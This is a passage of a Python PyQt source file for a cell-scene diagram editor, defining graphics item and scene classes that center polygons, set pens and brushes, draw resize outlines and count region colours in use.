lBoundingRegion.boundingRect() )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \" boundingRegion.rectCount() =\", lBoundingRegion.rectCount() )+\" \", CDConstants.DebugTODO )\n\n # create a QPainterPath from the bounding QRegion:\n# lNewPainterPath = QtGui.QPainterPath()\n# lNewPainterPath.addRegion(lBoundingRegion)\n# \n# lNewPainterPath = lNewPainterPath.simplified()\n# \n# CDConstants.printOut( \" \"+str( \" lNewPainterPath =\", lNewPainterPath )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \" lNewPainterPath.boundingRect() =\", lNewPainterPath.boundingRect() )+\" \", CDConstants.DebugTODO )\n\n # re-define the QGraphicsPolygonItem's QPolygonF from the newly built QPainterPath:\n # self.setPolygon = QtGui.QPolygonF(QtCore.QRectF(10, 10, 100, 200))\n # tmpPolygon = lNewPainterPath.toFillPolygon()\n# self.setPolygon(tmpPolygon)\n\n\n # 2011 - Mitja: re-center the incoming path so that its bounding rectangle\n # is 0-centered, and instead add a displacement to the item if necessary.\n\n # extract the boundingRect() to center the polygon's individual points()\n lBoundingRect = self.myPolygon.boundingRect()\n lCenterOfItemX = (lBoundingRect.width() * 0.5) + lBoundingRect.topLeft().x()\n lCenterOfItemY = (lBoundingRect.height() * 0.5) + lBoundingRect.topLeft().y()\n\n CDConstants.printOut(\"in DiagramItem._init_(): the bounding rect is = \"+str(lBoundingRect) , CDConstants.DebugVerbose )\n CDConstants.printOut(\"in DiagramItem._init_(): the rect's center is = \"+str(lCenterOfItemX)+\" \"+str(lCenterOfItemY) , CDConstants.DebugVerbose )\n\n lZeroCenteredPolygon = QtGui.QPolygonF()\n for lPointF in self.myPolygon:\n lZeroCenteredPointF = QtCore.QPointF( ( lPointF.x() - lCenterOfItemX ),\n ( lPointF.y() - lCenterOfItemY ) )\n # CDConstants.printOut( \" \"+str( \"DiagramItem_init_(): lPointF, lZeroCenteredPointF =\", lPointF, lZeroCenteredPointF )+\" \", CDConstants.DebugVerbose )\n lZeroCenteredPolygon.append(lZeroCenteredPointF)\n\n\n # finally assign the fixed QPolygonF to the QGraphicsPolygonItem:\n self.setPolygon(lZeroCenteredPolygon)\n self.setPos( QtCore.QPointF( lCenterOfItemX, lCenterOfItemY ) )\n\n self.setFlag(QtGui.QGraphicsItem.ItemIsMovable, True)\n self.setFlag(QtGui.QGraphicsItem.ItemIsSelectable, True)\n\n CDConstants.printOut(\" polygon 
(diagramType=\"+str(self.diagramType)+\").boundingRect =\"+str(self.polygon().boundingRect()) , CDConstants.DebugVerbose )\n CDConstants.printOut(\" item (diagramType=\"+str(self.diagramType)+\").boundingRect =\"+str(self.boundingRect()) , CDConstants.DebugVerbose )\n CDConstants.printOut(\" item (diagramType=\"+str(self.diagramType)+\").pen =\"+str(self.pen()) , CDConstants.DebugVerbose )\n CDConstants.printOut(\" item (diagramType=\"+str(self.diagramType)+\").brush =\"+str(self.brush()) , CDConstants.DebugVerbose )\n\n # 2010 - Mitja: we could override paint:\n# def paint(self, pPainter, pStyleOptionGraphicsItem, pWidget=None):\n# super(DiagramItem, self).paint(pPainter, pStyleOptionGraphicsItem, pWidget)\n# lBoundingRect = self.boundingRect()\n# CDConstants.printOut( \" \"+str( \"self.scene().myOutlineResizingItem =\", self.scene().myOutlineResizingItem )+\" \", CDConstants.DebugTODO )\n# self.scene().myOutlineResizingItem = self\n# CDConstants.printOut( \" \"+str( \"self.scene().myOutlineResizingItem =\", self.scene().myOutlineResizingItem )+\" \", CDConstants.DebugTODO )\n# # painter->drawRoundedRect(-10, -10, 20, 20, 5, 5);\n CDConstants.printOut(\"--------------------------------------------- DiagramItem.__init__() end\", CDConstants.DebugExcessive )\n # end of def __init__(self, pDiagramType, contextMenu, parent=None, scene=None)\n # ------------------------------------------------------------------\n\n\n\n\n # ------------------------------------------------------------------\n # 2011 - Mitja: for each scene item, is this item a region of cells or a single cell?\n # ------------------------------------------------------------------\n def setRegionOrCell(self, pRegionOrCell):\n\n self.itsaRegionOrCell = pRegionOrCell\n \n # is this item a region of cells or a single cell?\n if (self.itsaRegionOrCell == CDConstants.ItsaRegionConst):\n # for region items, use darkMagenta pen:\n CDConstants.printOut(\"setRegionOrCell does CDConstants.ItsaRegionConst\", CDConstants.DebugTODO )\n lMyPen = QtGui.QPen(QtCore.Qt.darkMagenta, 0.0, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n elif (self.itsaRegionOrCell == CDConstants.ItsaCellConst):\n # for cell items, use an orange \"#FF9900\" or (255, 153, 0) pen:\n CDConstants.printOut(\"setRegionOrCell does CDConstants.ItsaCellConst\", CDConstants.DebugTODO )\n lMyCellOutlineColor = QtGui.QColor(255, 153, 0)\n lMyPen = QtGui.QPen(lMyCellOutlineColor, 0.0, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n else:\n # for unknown items, use darkRed pen:\n CDConstants.printOut(\"setRegionOrCell does darkRed for UNKNOWN items\", CDConstants.DebugTODO )\n lMyPen = QtGui.QPen(QtCore.Qt.darkRed, 0.0, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n \n # 2011 - Mitja: according to Qt's documentation: \"QGraphicsItem\n # does not support use of cosmetic pens with a non-zero width\" :\n lMyPen.setCosmetic(True)\n\n CDConstants.printOut(\"setRegionOrCell does item.pen().color().rgba() = \"+str(self.pen().color().rgba()), CDConstants.DebugTODO )\n self.setPen(lMyPen)\n CDConstants.printOut(\"setRegionOrCell does item.pen().color().rgba() = \"+str(self.pen().color().rgba()), CDConstants.DebugTODO )\n\n # ------------------------------------------------------------------\n def setRegionID(self, pID):\n self.regionID = pID\n CDConstants.printOut(\"DiagramItem.setRegionID(\"+str(self.regionID)+\")\", CDConstants.DebugTODO )\n\n # ------------------------------------------------------------------\n def getRegionID(self):\n # 
CDConstants.printOut( \" \"+str( \"DiagramItem.getRegionID() =\",self.regionID )+\" \", CDConstants.DebugTODO )\n return (self.regionID)\n\n # ------------------------------------------------------------------\n def saveAndClearPen(self):\n # 2011 - Mitja: store a backup copy of the item's pen:\n self.bakPen = QtGui.QPen(self.pen())\n # 2011 - Mitja: create and assign an invisible pen:\n lMyPen = QtGui.QPen(QtCore.Qt.transparent, 0.0)\n lMyPen.setCosmetic(True)\n self.setPen(lMyPen)\n\n # ------------------------------------------------------------------\n def restorePen(self):\n # 2011 - Mitja: restore the backup copy to the item's active pen:\n self.setPen(self.bakPen)\n\n # ------------------------------------------------------------------\n def saveAndClearBrush(self):\n # 2011 - Mitja: store a backup copy of the item's Brush:\n self.bakBrush = QtGui.QBrush(self.brush())\n # 2011 - Mitja: create and assign a plain black Brush:\n lMyBrush = QtGui.QBrush(QtGui.QColor(QtCore.Qt.black))\n self.setBrush(lMyBrush)\n\n # ------------------------------------------------------------------\n def restoreBrush(self):\n # 2011 - Mitja: restore the backup copy to the item's active Brush:\n self.setBrush(self.bakBrush)\n\n # ------------------------------------------------------------------\n def removeArrow(self, arrow):\n try:\n self.arrows.remove(arrow)\n except ValueError:\n pass\n\n # ------------------------------------------------------------------\n def removeArrows(self):\n for arrow in self.arrows[:]:\n arrow.startItem().removeArrow(arrow)\n arrow.endItem().removeArrow(arrow)\n self.scene().removeItem(arrow)\n\n # ------------------------------------------------------------------\n def addArrow(self, arrow):\n self.arrows.append(arrow)\n\n\n # ------------------------------------------------------------------\n # 2010 - Mitja: renamed this method from \"image\" to \"pixmapForIconFromPolygon\"\n # since it returns a pixmap, NOT an image!!!\n # ------------------------------------------------------------------\n def pixmapForIconFromPolygon(self, pText=None):\n pixmap = QtGui.QPixmap(210, 210)\n pixmap.fill(QtCore.Qt.transparent)\n painter = QtGui.QPainter(pixmap)\n painter.setPen(QtGui.QPen(QtCore.Qt.black, 8.0))\n painter.translate(105, 105)\n\n # self.setFillRule(QtCore.Qt.WindingFill) from Qt documentation:\n # Specifies that the region is filled using the non zero winding rule.\n # With this rule, we determine whether a point is inside the shape by\n # using the following method. Draw a horizontal line from the point to a\n # location outside the shape. Determine whether the direction of the line\n # at each intersection point is up or down. The winding number is\n # determined by summing the direction of each intersection. If the number\n # is non zero, the point is inside the shape. 
This fill mode can also in\n    # most cases be considered as the intersection of closed shapes.\n\n        painter.drawPolygon(self.polygon(), QtCore.Qt.WindingFill)\n        \n        if (pText != None):\n#             painter.translate(-110, 100)\n            painter.setFont(QtGui.QFont(\"Helvetica\", 72))\n            painter.drawText(QtCore.QRectF(-105,30,210,100), QtCore.Qt.AlignCenter, pText)\n        \n        painter.end()\n\n        return pixmap\n\n\n    # ------------------------------------------------------------------\n    def contextMenuEvent(self, event):\n        # 2010 - Mitja: nothing to be done as \"context menu event\" here at the moment:\n        # self.scene().clearSelection()\n        # self.setSelected(True)\n        # self.myContextMenu.exec_(event.screenPos())\n        pass\n\n    # ------------------------------------------------------------------\n    def itemChange(self, change, value):\n        # CDConstants.printOut( \" \"+str( \"itemChange() itemChange() itemChange() itemChange() itemChange() itemChange() change, value =\", change, value )+\" \", CDConstants.DebugTODO )\n        if change == QtGui.QGraphicsItem.ItemPositionChange:\n            for arrow in self.arrows:\n                arrow.updatePosition()\n\n        return value\n\n    # ---------------------------------------------------------\n    # end of class DiagramItem(QtGui.QGraphicsPolygonItem)\n    # ---------------------------------------------------------\n\n# ------------------------------------------------------------\n# 2010 - Mitja: add code for handling insertion of pixmap items:\n# this class is UNUSED and can be safely removed in production code.\n# ------------------------------------------------------------\nclass DiagramPixmapItem(QtGui.QGraphicsPixmapItem):\n\n    # ---------------------------------------------------------\n    def __init__(self, pPixmap, pContextMenu, pParent=None, pScene=None):\n        super(DiagramPixmapItem, self).__init__(pParent, pScene)\n\n        self.arrows = []\n\n        self.itemPixmap = pPixmap\n        self.contextMenu = pContextMenu\n\n#         path = QtGui.QPainterPath()\n#         self.myPolygon = QtGui.QPolygonF([\n#                     QtCore.QPointF(-120, -80), QtCore.QPointF(-70, 80),\n#                     QtCore.QPointF(120, 80), QtCore.QPointF(70, -80),\n#                     QtCore.QPointF(-120, -80)])\n\n        # 2010 - Mitja: create a pixmap item here:\n        self.setPixmap(self.itemPixmap)\n\n        self.setFlag(QtGui.QGraphicsItem.ItemIsMovable, True)\n        self.setFlag(QtGui.QGraphicsItem.ItemIsSelectable, True)\n\n    # ---------------------------------------------------------\n    def removeArrow(self, arrow):\n        try:\n            self.arrows.remove(arrow)\n        except ValueError:\n            pass\n\n    # ---------------------------------------------------------\n    def removeArrows(self):\n        for arrow in self.arrows[:]:\n            arrow.startItem().removeArrow(arrow)\n            arrow.endItem().removeArrow(arrow)\n            self.scene().removeItem(arrow)\n\n    # ---------------------------------------------------------\n    def addArrow(self, arrow):\n        self.arrows.append(arrow)\n\n    # ---------------------------------------------------------\n    def pixmapForIconFromPolygon(self):\n\n        # 1. get a copy of the QGraphicsPixmapItem's pixmap:\n        lOriginalPixmap = QtGui.QPixmap.fromImage(self.pixmap().toImage())\n\n        # 2. create an empty pixmap in which to store the composed image:\n        lResultPixmap = QtGui.QPixmap(250, 250)\n        # 3. create a QPainter to perform the overlay operation:\n        lPainter = QtGui.QPainter(lResultPixmap)\n        # 4. 
do the overlay:\n        lPainter.setCompositionMode(lPainter.CompositionMode_Source)\n        lPainter.fillRect(lResultPixmap.rect(), QtCore.Qt.transparent)\n        lPainter.setCompositionMode(lPainter.CompositionMode_SourceOver)\n        lPainter.drawPixmap(QtCore.QPoint(0,0), lOriginalPixmap)\n        lPainter.end() \n        \n        return lResultPixmap\n\n\n    # ---------------------------------------------------------\n    def contextMenuEvent(self, event):\n        self.scene().clearSelection()\n        self.setSelected(True)\n        # use the \"contextMenu\" attribute stored in __init__() above\n        # (this class has no \"myContextMenu\" attribute):\n        self.contextMenu.exec_(event.screenPos())\n\n    # ---------------------------------------------------------\n    def itemChange(self, change, value):\n        if change == QtGui.QGraphicsItem.ItemPositionChange:\n            for arrow in self.arrows:\n                arrow.updatePosition()\n\n        return value\n    # ---------------------------------------------------------\n\n    # ---------------------------------------------------------\n    # end of class DiagramPixmapItem(QtGui.QGraphicsPixmapItem)\n    # ---------------------------------------------------------\n\n\n# ------------------------------------------------------------\n# ------------------------------------------------------------\nclass DiagramScene(QtGui.QGraphicsScene):\n\n    signalThatItemInserted = QtCore.pyqtSignal(DiagramItem)\n\n    signalThatTextInserted = QtCore.pyqtSignal(QtGui.QGraphicsTextItem)\n\n    signalThatItemSelected = QtCore.pyqtSignal(QtGui.QGraphicsItem)\n\n    # 2011 - Mitja:\n    signalThatItemResized = QtCore.pyqtSignal(QtCore.QRectF)\n\n    # 2011 - Mitja: add a signal for scene resizing. Has to be handled well!\n    signalThatSceneResized = QtCore.pyqtSignal(dict)\n\n\n    def __init__(self, pEditMenu, pParent=None):\n        super(DiagramScene, self).__init__(pParent)\n\n        self.parentWidget = pParent\n        self.myItemMenu = pEditMenu\n        self.mySceneMode = CDConstants.SceneModeMoveItem\n        if self.parentWidget.parentWindow != None:\n            self.parentWidget.parentWindow.setWindowTitle(\"Cell Scene Editor\")\n\n        # 2010 - Mitja: to resize an item by using the right-click,\n        #   add a global variable flag, i.e. direct pointer to the item being resized:\n        self.myRightButtonResizingItem = None\n        self.myRightButtonResizingClickX = -1.0\n        self.myRightButtonResizingClickY = -1.0\n\n        # 2010 - Mitja: to resize an item by using an outline of the item's bounding rectangle,\n        #   add a global variable flag, i.e. 
direct pointer to the item being resized:\n self.myOutlineResizingItem = None\n # myOutlineResizingVertex can be: \"None\", \"bottomLeft\", \"bottomRight\", \"topRight\", \"topLeft\":\n self.myOutlineResizingVertex = \"None\"\n self.myOutlineResizingCurrentX = -1.0\n self.myOutlineResizingCurrentY = -1.0\n\n # 2010 - Mitja: add scene units:\n self.mySceneUnits = \"Pixel\"\n\n # 2011 - Mitja: add scene depth:\n self.mySceneDepth = 1.0\n\n\n # 2011 - Mitja: a reference to a sequence of images:\n self.theImageSequence = None\n\n\n # 2011 - Mitja: a reference to an external QPaint-drawing class,\n # to draw an overlay in drawForeground() :\n self.theImageLayer = None\n # 2011 - Mitja: flag to temporarily completely disable drawing the overlay:\n self.isDrawForegroundEnabled = True\n # 2011 - Mitja: flag to prevent recursive repaints (shouldn't this be handled automatically by Qt?!?):\n self.isDrawForegroundInProgress = False\n\n # 2011 -\n # regionUseDict = a dict of all region names and their current use,\n # one for each RGBA color: [name,#regions](color)\n self.regionUseDict = {}\n\n\n # 2011 - Mitja: set defaults for each new Item in the Scene:\n self.myItemRegionOrCell = CDConstants.ItsaRegionConst\n\n self.myItemType = DiagramItem.RectangleConst\n self.line = None\n self.textItem = None\n self.myItemColor = QtCore.Qt.green\n self.myTextColor = QtCore.Qt.red\n self.myLineColor = QtCore.Qt.black\n self.myFont = QtGui.QFont()\n \n # 2011 - Mitja: an ever-incrementing totalItemsCounter, to keep a unique\n # string as toolTip for each item in the scene.\n self.totalItemsCounter = int(0)\n \n # 2011 Mitja - add scale/zoom parameters stored into our DiagramScene object:\n # This is just so that we can scale the outline's circles/ellipses\n # when interactively/manually scaling a scene item.\n # The scale factor takes care of the RHS <-> LHS mismatch at its visible end,\n # by flipping the y coordinate in the QGraphicsView's affine transformations:\n self.myViewScaleZoomX = 1.0\n self.myViewScaleZoomY = -1.0\n\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: set the depth value for scene, to keep for completeness:\n # ------------------------------------------------------------\n def setDepth(self, pValue = 1.0):\n # 2011 - Mitja - add scene depth:\n self.mySceneDepth = pValue\n\n # ------------------------------------------------------------\n # 2011 - Mitja: set the depth value for scene, to keep for completeness:\n # ------------------------------------------------------------\n def depth(self):\n # 2011 - Mitja - add scene depth:\n return self.mySceneDepth\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: set the reference for overlay drawing in drawForeground() :\n # ------------------------------------------------------------\n def setImageLayer(self, pImageLayer = None):\n if isinstance( pImageLayer, CDImageLayer ) == True:\n self.theImageLayer = pImageLayer\n\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: set the reference for a sequence of images:\n # ------------------------------------------------------------\n def setImageSequence(self, pImageSequence = None):\n if isinstance( pImageSequence, CDImageSequence ) == True:\n self.theImageSequence = pImageSequence\n\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: set flag to temporarily completely disable drawing the overlay:\n # 
------------------------------------------------------------\n def setDrawForegroundEnabled(self, pYesOrNo = True):\n self.isDrawForegroundEnabled = pYesOrNo\n CDConstants.printOut(\"DiagramScene.setDrawForegroundEnabled( pYesOrNo==\"+str(pYesOrNo)+\" )\", CDConstants.DebugTODO )\n\n\n\n # ------------------------------------------------------------\n # 2012 - Mitja: retrieve the flag to temporarily completely disable drawing the overlay:\n # ------------------------------------------------------------\n def getDrawForegroundEnabled(self):\n CDConstants.printOut(\"DiagramScene.getDrawForegroundEnabled() returning \" +str(self.isDrawForegroundEnabled), CDConstants.DebugTODO )\n return self.isDrawForegroundEnabled\n\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja - we reimplement drawForeground() because\n # we need to draw an outline of the selected item on the top (foreground) of the scene\n # ------------------------------------------------------------\n def drawForeground(self, pPainter, pRect):\n super(DiagramScene, self).drawForeground(pPainter, pRect)\n\n # check the flag that temporarily completely disables drawing the overlay:\n if (self.isDrawForegroundEnabled == False):\n return\n\n # check the flag that signals drawForeground() in progress...\n # ....to prevent recursive repaints (shouldn't this be handled automatically by Qt?!?) :\n if (self.isDrawForegroundInProgress == True):\n return\n else:\n # set the flag that signals drawForeground() in progress:\n self.isDrawForegroundInProgress = True\n\n\n # 2011 - Mitja - use this overlay routine to draw a single instance of one cluster\n # as foreground to the graphics scene, in \"SceneModeEditCluster\"\n if (self.mySceneMode == CDConstants.SceneModeEditCluster):\n\n # store the current pen & brush & background & bg mode to restore them later:\n lTmpPen = pPainter.pen()\n lTmpBrush = pPainter.brush()\n lTmpBackground = pPainter.background()\n lTmpBackgroundMode = pPainter.backgroundMode()\n\n # TODO: replace with a new paint call for scene edit clusters!\n\n # this used to call the theImageSequence's paintEvent handler directly: self.theImageSequence.paintEvent(pPainter)\n # but direct paintEvent calls are BAD! instead we now call our separate paint routine:\n # self.theImageSequence.paintTheImageSequence(pPainter)\n\n # restore the painter's pen & background to what they were before this function:\n pPainter.setPen(lTmpPen)\n pPainter.setBrush(lTmpBrush)\n pPainter.setBackground(lTmpBackground)\n pPainter.setBackgroundMode(lTmpBackgroundMode)\n\n\n # 2011 - Mitja - use this overlay routine to draw selected content from an image sequence\n # as foreground to the graphics scene, in \"SceneModeImageSequence\"\n if (self.mySceneMode == CDConstants.SceneModeImageSequence) and \\\n (self.theImageSequence != None):\n\n # store the current pen & brush & background & bg mode to restore them later:\n lTmpPen = pPainter.pen()\n lTmpBrush = pPainter.brush()\n lTmpBackground = pPainter.background()\n lTmpBackgroundMode = pPainter.backgroundMode()\n \n # this used to call the theImageSequence's paintEvent handler directly: self.theImageSequence.paintEvent(pPainter)\n # but direct paintEvent calls are BAD! 
instead we now call our separate paint routine:\n            self.theImageSequence.paintTheImageSequence(pPainter)\n            \n            # restore the painter's pen & background to what they were before this function:\n            pPainter.setPen(lTmpPen)\n            pPainter.setBrush(lTmpBrush)\n            pPainter.setBackground(lTmpBackground)\n            pPainter.setBackgroundMode(lTmpBackgroundMode)\n\n\n\n        # 2011 - Mitja - use this overlay routine to draw an image label\n        #   as foreground to the graphics scene, in \"image layer mode\"\n        elif (self.mySceneMode == CDConstants.SceneModeImageLayer) and \\\n            (self.theImageLayer != None):\n\n            # store the current pen & brush & background & bg mode to restore them later:\n            lTmpPen = pPainter.pen()\n            lTmpBrush = pPainter.brush()\n            lTmpBackground = pPainter.background()\n            lTmpBackgroundMode = pPainter.backgroundMode()\n            \n            # this used to call the theImageLayer's paintEvent handler directly: self.theImageLayer.paintEvent(pPainter)\n            # but direct paintEvent calls are BAD! instead we now call our separate paint routine:\n            self.theImageLayer.paintTheImageLayer(pPainter)\n            \n            # restore the painter's pen & background to what they were before this function:\n            pPainter.setPen(lTmpPen)\n            pPainter.setBrush(lTmpBrush)\n            pPainter.setBackground(lTmpBackground)\n            pPainter.setBackgroundMode(lTmpBackgroundMode)\n\n\n        # 2010 - Mitja - draw an overlay outline of the item being resized\n        #   by dragging one of the outline corner vertices:\n        elif self.myOutlineResizingItem != None:\n# TODO: find the true bounding rect for the item's polygon WITHOUT its border: lBoundingRect = self.myOutlineResizingItem.polygon().sceneBoundingRect()\n            lBoundingRect = self.myOutlineResizingItem.sceneBoundingRect()\n            # store the current pen & brush & background & bg mode to restore them later:\n            lTmpPen = pPainter.pen()\n            lTmpBrush = pPainter.brush()\n            lTmpBackground = pPainter.background()\n            lTmpBackgroundMode = pPainter.backgroundMode()\n\n#             lOutlinePen = QtGui.QPen( QtGui.QColor(255, 128, 0) )\n#             lOutlinePen.setWidth(4)\n\n            # draw the rectangular outline of the QGraphicsItem which is being resized:\n            # draw in two colors, solid and dotted:\n            lOutlineColor = QtGui.QColor(35, 166, 94)\n            # we set all QtGui.QPen sizes to 0.0 for cosmetic lines that have to remain of minimal line-width when zooming:\n            lOutlinePen = QtGui.QPen(lOutlineColor, 0.0, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n            # lOutlinePen = QtGui.QPen(lOutlineColor, 2, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n            lOutlinePen.setCosmetic(True)\n            pPainter.setPen(lOutlinePen)\n            pPainter.drawRect(lBoundingRect)\n\n            lOutlineColor = QtGui.QColor(219, 230, 249)\n            lOutlinePen = QtGui.QPen(lOutlineColor, 0.0, QtCore.Qt.DotLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n            lOutlinePen.setCosmetic(True)\n            pPainter.setPen(lOutlinePen)\n            pPainter.drawRect(lBoundingRect)\n\n            # draw circles at the rectangular outline's vertices:\n\n            pPainter.setBackgroundMode( QtCore.Qt.OpaqueMode )\n            \n            pPainter.setBrush( QtGui.QBrush( QtGui.QColor(219, 230, 249) ) )\n            lOutlineColor = QtGui.QColor(35, 166, 94)\n            lOutlinePen = QtGui.QPen(lOutlineColor, 0.0, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n            lOutlinePen.setCosmetic(True)\n            pPainter.setPen(lOutlinePen)\n            # 2011 Mitja - zoom the ellipses smaller as the scene zooms bigger, and vice versa,\n            #   so that they always appear at the same size to the user resizing the items.\n            pPainter.drawEllipse(lBoundingRect.bottomLeft(), (4 / self.myViewScaleZoomX), (4 / self.myViewScaleZoomY))\n            
pPainter.drawEllipse(lBoundingRect.bottomRight(), (4 / self.myViewScaleZoomX), (4 / self.myViewScaleZoomY))\n            pPainter.drawEllipse(lBoundingRect.topRight(), (4 / self.myViewScaleZoomX), (4 / self.myViewScaleZoomY))\n            pPainter.drawEllipse(lBoundingRect.topLeft(), (4 / self.myViewScaleZoomX), (4 / self.myViewScaleZoomY))\n\n            pPainter.setBrush( QtGui.QBrush( QtGui.QColor(255, 255, 0) ) )\n            if self.myOutlineResizingVertex == \"bottomLeft\":\n                pPainter.drawEllipse(lBoundingRect.bottomLeft(), (4 / self.myViewScaleZoomX), (4 / self.myViewScaleZoomY))\n            elif self.myOutlineResizingVertex == \"bottomRight\":\n                pPainter.drawEllipse(lBoundingRect.bottomRight(), (4 / self.myViewScaleZoomX), (4 / self.myViewScaleZoomY))\n            elif self.myOutlineResizingVertex == \"topRight\":\n                pPainter.drawEllipse(lBoundingRect.topRight(), (4 / self.myViewScaleZoomX), (4 / self.myViewScaleZoomY))\n            elif self.myOutlineResizingVertex == \"topLeft\":\n                pPainter.drawEllipse(lBoundingRect.topLeft(), (4 / self.myViewScaleZoomX), (4 / self.myViewScaleZoomY))\n            \n            # restore the painter's pen & background to what they were before this function:\n            pPainter.setPen(lTmpPen)\n            pPainter.setBrush(lTmpBrush)\n            pPainter.setBackground(lTmpBackground)\n            pPainter.setBackgroundMode(lTmpBackgroundMode)\n            \n            # emit the resized item's bounding rect, e.g. so that x/y/w/h displays can update:\n            self.signalThatItemResized.emit(lBoundingRect)\n\n\n\n        # 2010 - Mitja - draw an overlay outline of the item being resized\n        #   by right-clicking (or control-clicking, depending on Qt settings) mouse motion:\n        elif self.myRightButtonResizingItem != None:\n            lBoundingRect = self.myRightButtonResizingItem.sceneBoundingRect()\n            lTmpPen = pPainter.pen()\n\n            # draw in two colors, solid and dotted:\n            lOutlineColor = QtGui.QColor(224, 100, 0)\n            # we set all QtGui.QPen sizes to 0.0 for cosmetic lines that have to remain of minimal line-width when zooming:\n            lOutlinePen = QtGui.QPen(lOutlineColor, 0.0, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n            # lOutlinePen = QtGui.QPen(lOutlineColor, 2, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n            lOutlinePen.setCosmetic(True)\n            pPainter.setPen(lOutlinePen)\n            pPainter.drawRect(lBoundingRect)\n\n            lOutlineColor = QtGui.QColor(255, 220, 0)\n            lOutlinePen = QtGui.QPen(lOutlineColor, 0.0, QtCore.Qt.DotLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n            lOutlinePen.setCosmetic(True)\n            pPainter.setPen(lOutlinePen)\n            pPainter.drawRect(lBoundingRect)\n\n            pPainter.setPen(lTmpPen)\n        \n        # clear the flag that signals drawForeground() in progress...\n        # ....to prevent recursive repaints (shouldn't this be handled automatically by Qt?!?) 
:\n        self.isDrawForegroundInProgress = False\n\n        # end of def drawForeground(self, pPainter, pRect)\n    # ------------------------------------------------------------\n\n    \n    # ------------------------------------------------------------\n    # 2010 - Mitja: we could reimplement drawBackground() because\n    #   we don't want a tiled image as background\n    #\n    # ...we don't reimplement it for now....\n    # ------------------------------------------------------------\n    # def drawBackground(self, pPainter, pRect):\n    #     super(DiagramScene, self).drawBackground(pPainter, pRect)\n\n\n\n\n    # ------------------------------------------------------------\n    # 2010 - Mitja - we reimplement addItem() because\n    #   we want to add a toolTip to each item that's added to the scene,\n    #   and because we can have a unique sequential ID for each\n    #   scene item this way.\n    # ------------------------------------------------------------\n    def addItem(self, pGraphicsItem):\n        self.totalItemsCounter = self.totalItemsCounter + 1\n        pGraphicsItem.setToolTip(str(self.totalItemsCounter))\n        pGraphicsItem.setRegionID(self.totalItemsCounter)\n        super(DiagramScene, self).addItem(pGraphicsItem)\n        # end of def addItem(self)\n    # ---------------------------------------------------------\n\n\n\n    # ------------------------------------------------------------\n    # 2011 - Mitja: add another color as in use by a region in the Cell Scene:\n    # ------------------------------------------------------------\n    def addToRegionColorsInUse(self, pColor):\n        CDConstants.printOut(\"==================================== addToRegionColorsInUse\", CDConstants.DebugTODO )\n\n        # retrieve the region \"name(color)\" dictionary from the table of regions:\n        lRegionsTableDict = self.parentWidget.parentWindow.theTableOfTypes.getRegionsDict()\n        lKeys = lRegionsTableDict.keys()\n        # lColor is the color for which we have to update the use count;\n        #   accept a QBrush as well, since some callers pass an item's brush\n        #   (QtGui.QColor() cannot be constructed directly from a QBrush):\n        if isinstance(pColor, QtGui.QBrush):\n            pColor = pColor.color()\n        lColor = QtGui.QColor(pColor)\n        # lCount is where we temporarily place the count of regions using lColor:\n        lCount = 0\n\n        # find the name corresponding to the added color, and add it to the scene's regionUseDict:\n        for i in xrange(len(lRegionsTableDict)) :\n\n            if lRegionsTableDict[lKeys[i]][0].rgba() == lColor.rgba() :\n\n                # check if there is already an entry for this color in the self.regionUseDict :\n                if lColor.rgba() not in self.regionUseDict:\n                    CDConstants.printOut(\"NO \"+str(lColor.rgba())+\" not in \"+str(self.regionUseDict), CDConstants.DebugTODO )\n                    # add a new entry to the self.regionUseDict local dictionary of used colors :\n                    lCount = 1\n                else:\n                    CDConstants.printOut(\"YES \"+str(lColor.rgba())+\" in \"+str(self.regionUseDict), CDConstants.DebugTODO )\n                    # increment the current entry in the self.regionUseDict local dictionary of used colors:\n                    lCount = 1 + self.regionUseDict[ lColor.rgba() ][1]\n\n                self.regionUseDict[ lColor.rgba() ] = [ lRegionsTableDict[lKeys[i]][1], lCount ]\n                \n                CDConstants.printOut( str(self.regionUseDict[ lColor.rgba() ][0])+\" \"+str(self.regionUseDict[ lColor.rgba() ][1]) , CDConstants.DebugTODO )\n\n        # signal upstream about the updated usage of this region color:\n        self.parentWidget.parentWindow.theTableOfTypes.updateRegionUseOfTableElements(lColor, lCount)\n\n        # if there is at least one color in the regionUseDict table, show the table:\n#         if self.regionUseDict :\n#             # we can test the dict this way because, according to the Python manual,\n#             # \"any empty sequence, for example, '', (), []\" is considered false.\n#             self.parentWidget.signalVisibilityPIFRegionTable.emit(\"Show\")\n        
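        # A minimal sketch of the bookkeeping above, using hypothetical values\n        #   (not taken from a real scene): if the table of regions holds an entry\n        #   [ QtGui.QColor(0, 255, 0), \"Green\" ] and two green items are already\n        #   in the scene, then:\n        #\n        #       self.regionUseDict[ QtGui.QColor(0, 255, 0).rgba() ] == [ \"Green\", 2 ]\n        #\n        #   adding a third green item through addToRegionColorsInUse() updates the\n        #   entry to [ \"Green\", 3 ]; subtractFromRegionColorsInUse() (below) then\n        #   decrements the count, and deletes the key once the count drops below 1.\n        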
